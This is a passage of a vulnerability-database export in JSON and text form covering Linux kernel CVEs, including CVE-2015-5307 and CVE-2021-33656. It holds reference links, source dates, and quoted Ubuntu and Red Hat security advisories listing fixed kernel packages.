        "title": "Ubuntu Security Notice: linux-lts-utopic vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2805-1"
      },
      {
        "title": "Red Hat: CVE-2015-5307",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-5307"
      },
      {
        "title": "Debian Security Advisories: DSA-3454-1 virtualbox -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=77cc990635f1378372ad437247c70f65"
      },
      {
        "title": "Debian Security Advisories: DSA-3414-1 xen -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d81330fe0cb138acbe2c11ee586167b2"
      },
      {
        "title": "Debian CVElist Bug Report Logs: Multiple security issues",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=d3f34965665f8672bfcf7c84c5b82813"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71"
      },
      {
        "title": "cve_diff_checker",
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker "
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-5307"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-399",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-5307"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.4,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1277172"
      },
      {
        "trust": 1.4,
        "url": "http://xenbits.xen.org/xsa/advisory-156.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
      },
      {
        "trust": 1.4,
        "url": "http://support.citrix.com/article/ctx202583"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0046.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2805-1"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2802-1"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2801-1"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2804-1"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2807-1"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-2645.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2015/11/10/6"
      },
      {
        "trust": 1.1,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=54a20552e1eae07aa240fa370a0293e006b5faed"
      },
      {
        "trust": 1.1,
        "url": "https://github.com/torvalds/linux/commit/54a20552e1eae07aa240fa370a0293e006b5faed"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00038.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/77528"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00013.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172435.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00035.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2015/dsa-3396"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00005.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00026.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1034105"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2016/dsa-3454"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-2636.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00039.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172300.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2015/dsa-3414"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172187.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00031.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2806-1"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2800-1"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00053.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2803-1"
      },
      {
        "trust": 1.1,
        "url": "https://kb.juniper.net/jsa10783"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5307"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2015-5307"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0024.html"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8104"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2015-8104"
      },
      {
        "trust": 0.3,
        "url": "http://www.linux-kvm.org/page/main_page"
      },
      {
        "trust": 0.3,
        "url": "http://www.xen.org/"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10770\u0026actp=rss"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10783\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "https://technet.microsoft.com/library/security/3108638.aspx"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0004.html"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/399.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2016:0004"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2807-1/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=42022"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-wily/4.2.0-18.22~14.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.13.0-68.111"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.19.0-33.38"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-7613"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2015-2587.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-2925"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2925"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7613"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-utopic/3.16.0-53.72~14.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2015-2552.html"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-trusty/3.13.0-68.111~precise1"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-5307"
      },
      {
        "db": "BID",
        "id": "77528"
      },
      {
        "db": "PACKETSTORM",
        "id": "135227"
      },
      {
        "db": "PACKETSTORM",
        "id": "134303"
      },
      {
        "db": "PACKETSTORM",
        "id": "134289"
      },
      {
        "db": "PACKETSTORM",
        "id": "134292"
      },
      {
        "db": "PACKETSTORM",
        "id": "134716"
      },
      {
        "db": "PACKETSTORM",
        "id": "134295"
      },
      {
        "db": "PACKETSTORM",
        "id": "134828"
      },
      {
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "db": "PACKETSTORM",
        "id": "134701"
      },
      {
        "db": "PACKETSTORM",
        "id": "134294"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-5307"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2015-5307"
      },
      {
        "db": "BID",
        "id": "77528"
      },
      {
        "db": "PACKETSTORM",
        "id": "135227"
      },
      {
        "db": "PACKETSTORM",
        "id": "134303"
      },
      {
        "db": "PACKETSTORM",
        "id": "134289"
      },
      {
        "db": "PACKETSTORM",
        "id": "134292"
      },
      {
        "db": "PACKETSTORM",
        "id": "134716"
      },
      {
        "db": "PACKETSTORM",
        "id": "134295"
      },
      {
        "db": "PACKETSTORM",
        "id": "134828"
      },
      {
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "db": "PACKETSTORM",
        "id": "134701"
      },
      {
        "db": "PACKETSTORM",
        "id": "134294"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-5307"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-11-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-5307"
      },
      {
        "date": "2015-11-10T00:00:00",
        "db": "BID",
        "id": "77528"
      },
      {
        "date": "2016-01-12T15:55:00",
        "db": "PACKETSTORM",
        "id": "135227"
      },
      {
        "date": "2015-11-10T23:56:00",
        "db": "PACKETSTORM",
        "id": "134303"
      },
      {
        "date": "2015-11-10T17:56:19",
        "db": "PACKETSTORM",
        "id": "134289"
      },
      {
        "date": "2015-11-10T17:58:45",
        "db": "PACKETSTORM",
        "id": "134292"
      },
      {
        "date": "2015-12-09T15:22:30",
        "db": "PACKETSTORM",
        "id": "134716"
      },
      {
        "date": "2015-11-10T17:59:04",
        "db": "PACKETSTORM",
        "id": "134295"
      },
      {
        "date": "2015-12-16T03:31:08",
        "db": "PACKETSTORM",
        "id": "134828"
      },
      {
        "date": "2016-01-19T21:09:08",
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "date": "2015-12-08T17:27:53",
        "db": "PACKETSTORM",
        "id": "134701"
      },
      {
        "date": "2015-11-10T17:58:58",
        "db": "PACKETSTORM",
        "id": "134294"
      },
      {
        "date": "2015-11-16T11:59:05.070000",
        "db": "NVD",
        "id": "CVE-2015-5307"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-5307"
      },
      {
        "date": "2017-04-18T00:05:00",
        "db": "BID",
        "id": "77528"
      },
      {
        "date": "2023-02-12T23:15:35.367000",
        "db": "NVD",
        "id": "CVE-2015-5307"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "77528"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel CVE-2015-5307 Denial of Service Vulnerability",
    "sources": [
      {
        "db": "BID",
        "id": "77528"
      }
    ],
    "trust": 0.3
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Failure to Handle Exceptional Conditions",
    "sources": [
      {
        "db": "BID",
        "id": "77528"
      }
    ],
    "trust": 0.3
  }
}

var-202207-1358
Vulnerability from variot

When setting font with malicous data by ioctl cmd PIO_FONT,kernel will write memory out of bounds. Linux Kernel Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. ========================================================================== Ubuntu Security Notice USN-5580-1 August 24, 2022

linux-aws vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-aws: Linux kernel for Amazon Web Services (AWS) systems

Details:

It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33655)

It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A remote attacker could use this to expose sensitive information (kernel memory). (CVE-2022-20368)

Domingo Dirutigliano and Nicola Guerrera discovered that the netfilter subsystem in the Linux kernel did not properly handle rules that truncated packets below the packet header size. When such rules are in place, a remote attacker could possibly use this to cause a denial of service (system crash). (CVE-2022-36946)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 ESM: linux-image-4.4.0-1150-aws 4.4.0-1150.165 linux-image-aws 4.4.0.1150.154

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.6.6 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security Fix(es): * CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command * CVE-2023-32314 vm2: Sandbox Escape * CVE-2023-32313 vm2: Inspect Manipulation

  1. Solution:

For Red Hat Advanced Cluster Management for Kubernetes, see the following documentation for details on how to install the images:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online

  1. Bugs fixed (https://bugzilla.redhat.com/):

2187525 - CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command 2208376 - CVE-2023-32314 vm2: Sandbox Escape 2208377 - CVE-2023-32313 vm2: Inspect Manipulation

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2023:4789-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:4789 Issue date: 2023-08-29 CVE Names: CVE-2021-33656 CVE-2022-42896 CVE-2023-1637 CVE-2023-1829 CVE-2023-2002 CVE-2023-2124 CVE-2023-3390 CVE-2023-20593 CVE-2023-28466 CVE-2023-35788 =====================================================================

  1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, x86_64 Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

  • kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c (CVE-2022-42896)

  • kernel: Use-after-free vulnerability in the Linux Kernel traffic control index filter (CVE-2023-1829)

  • kernel: UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests (CVE-2023-3390)

  • kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt() (CVE-2023-35788)

  • kernel: when setting font with malicious data by ioctl PIO_FONT, kernel will write memory out of bounds (CVE-2021-33656)

  • kernel: save/restore speculative MSRs during S3 suspend/resume (CVE-2023-1637)

  • Kernel: bluetooth: Unauthorized management command execution (CVE-2023-2002)

  • kernel: OOB access in the Linux kernel's XFS subsystem (CVE-2023-2124)

  • hw: amd: Cross-Process Information Leak (CVE-2023-20593)

  • kernel: tls: race condition in do_tls_getsockopt may lead to use-after-free or NULL pointer dereference (CVE-2023-28466)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • Simultaneous writes to a page on xfs can result in zero-byte data (BZ#2184103)

  • Invalid character detected by rpminspect in Documentation/translations/zh_CN/process/magic-number.rst (BZ#2208286)

  • Low memory deadlock with md devices and external (imsm) metadata handling

    • requires a kernfs notification backport (BZ#2208542)
  • Windows Server 2019 guest randomly pauses with "KVM: entry failed, hardware error 0x80000021" (BZ#2211663)

  • Marvell 8.7 Bug qedi shutdown handler hangs upon reboot (BZ#2215334)

  • aacraid misses interrupts when a CPU is disabled resulting in scsi timeouts and the adapter being unusable until reboot. (BZ#2216499)

  • rbd: avoid fast-diff corruption in snapshot-based mirroring [8.9] (BZ#2216770)

  • OCS 4.8 cephfs kernel crash : mds_dispatch ceph_handle_snap unable to handle kernel NULL (BZ#2218273)

  • FJ8.6 Bug: System panic occurs because the list used by i40e driver is corrupted (BZ#2219262)

  • st_gmac tx-checksum offload on vlan is not consistent with st_gmac interface (BZ#2219908)

  • Regression of 3b8cc6298724 ("blk-cgroup: Optimize blkcg_rstat_flush()") (BZ#2220811)

  • refcount_t overflow often happens in mem_cgroup_id_get_online() (BZ#2221011)

  • Scheduler update (rhel8.8) (BZ#2221304)

  • RHEL8.6 boot panic with message "kernel BUG at lib/list_debug.c:28!" (BZ#2222247)

  • Enable conntrack clash resolution for GRE (BZ#2223543)

  • Intel 8.8 BUG SPR perf: Workaround the UPI intel_uncore_has_discovery_tables issue on SPR MCC and LCC (BZ#2225514)

  • KVM: x86: fix sending PV IPI (BZ#2226580)

  • libceph: harden msgr2.1 frame segment length checks [8.x] (BZ#2227074)

Enhancement(s):

  • Mellanox 8.7 FEAT mlx5: It's possible to enable LRO when XDP is active (BZ#2165585)

  • Export symbol pci_find_host_bridge (BZ#2225335)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

2108696 - CVE-2021-33656 kernel: when setting font with malicious data by ioctl PIO_FONT, kernel will write memory out of bounds 2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c 2179000 - CVE-2023-28466 kernel: tls: race condition in do_tls_getsockopt may lead to use-after-free or NULL pointer dereference 2181891 - CVE-2023-1637 kernel: save/restore speculative MSRs during S3 suspend/resume 2187308 - CVE-2023-2002 Kernel: bluetooth: Unauthorized management command execution 2187439 - CVE-2023-2124 kernel: OOB access in the Linux kernel's XFS subsystem 2188470 - CVE-2023-1829 kernel: Use-after-free vulnerability in the Linux Kernel traffic control index filter 2213260 - CVE-2023-3390 kernel: UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests 2215768 - CVE-2023-35788 kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt() 2217845 - CVE-2023-20593 hw: amd: Cross-Process Information Leak

  1. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source: kernel-4.18.0-372.70.1.el8_6.src.rpm

aarch64: bpftool-4.18.0-372.70.1.el8_6.aarch64.rpm bpftool-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-core-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-cross-headers-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debug-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debug-core-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debug-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debug-devel-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debug-modules-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debug-modules-extra-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-devel-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-headers-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-modules-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-modules-extra-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-tools-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-tools-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm kernel-tools-libs-4.18.0-372.70.1.el8_6.aarch64.rpm perf-4.18.0-372.70.1.el8_6.aarch64.rpm perf-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm python3-perf-4.18.0-372.70.1.el8_6.aarch64.rpm python3-perf-debuginfo-4.18.0-372.70.1.el8_6.aarch64.rpm

noarch: kernel-abi-stablelists-4.18.0-372.70.1.el8_6.noarch.rpm kernel-doc-4.18.0-372.70.1.el8_6.noarch.rpm

ppc64le: bpftool-4.18.0-372.70.1.el8_6.ppc64le.rpm bpftool-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-core-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-cross-headers-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debug-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debug-core-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debug-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debug-devel-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debug-modules-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debug-modules-extra-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-devel-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-headers-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-modules-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-modules-extra-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-tools-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-tools-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm kernel-tools-libs-4.18.0-372.70.1.el8_6.ppc64le.rpm perf-4.18.0-372.70.1.el8_6.ppc64le.rpm perf-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm python3-perf-4.18.0-372.70.1.el8_6.ppc64le.rpm python3-perf-debuginfo-4.18.0-372.70.1.el8_6.ppc64le.rpm

s390x: bpftool-4.18.0-372.70.1.el8_6.s390x.rpm bpftool-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm kernel-4.18.0-372.70.1.el8_6.s390x.rpm kernel-core-4.18.0-372.70.1.el8_6.s390x.rpm kernel-cross-headers-4.18.0-372.70.1.el8_6.s390x.rpm kernel-debug-4.18.0-372.70.1.el8_6.s390x.rpm kernel-debug-core-4.18.0-372.70.1.el8_6.s390x.rpm kernel-debug-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm kernel-debug-devel-4.18.0-372.70.1.el8_6.s390x.rpm kernel-debug-modules-4.18.0-372.70.1.el8_6.s390x.rpm kernel-debug-modules-extra-4.18.0-372.70.1.el8_6.s390x.rpm kernel-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-372.70.1.el8_6.s390x.rpm kernel-devel-4.18.0-372.70.1.el8_6.s390x.rpm kernel-headers-4.18.0-372.70.1.el8_6.s390x.rpm kernel-modules-4.18.0-372.70.1.el8_6.s390x.rpm kernel-modules-extra-4.18.0-372.70.1.el8_6.s390x.rpm kernel-tools-4.18.0-372.70.1.el8_6.s390x.rpm kernel-tools-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm kernel-zfcpdump-4.18.0-372.70.1.el8_6.s390x.rpm kernel-zfcpdump-core-4.18.0-372.70.1.el8_6.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm kernel-zfcpdump-devel-4.18.0-372.70.1.el8_6.s390x.rpm kernel-zfcpdump-modules-4.18.0-372.70.1.el8_6.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-372.70.1.el8_6.s390x.rpm perf-4.18.0-372.70.1.el8_6.s390x.rpm perf-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm python3-perf-4.18.0-372.70.1.el8_6.s390x.rpm python3-perf-debuginfo-4.18.0-372.70.1.el8_6.s390x.rpm

x86_64: bpftool-4.18.0-372.70.1.el8_6.x86_64.rpm bpftool-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-core-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-cross-headers-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debug-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debug-core-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debug-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debug-devel-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debug-modules-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debug-modules-extra-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-devel-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-headers-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-modules-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-modules-extra-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-tools-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-tools-debuginfo-4.18.0-372.70.1.el8_6.x86_64.rpm kernel-tools-libs-4.18.0-372.70.1.el8_6.x86_64.rpm perf-4.18.0-372.70.1.el8_6.x86_64.rpm 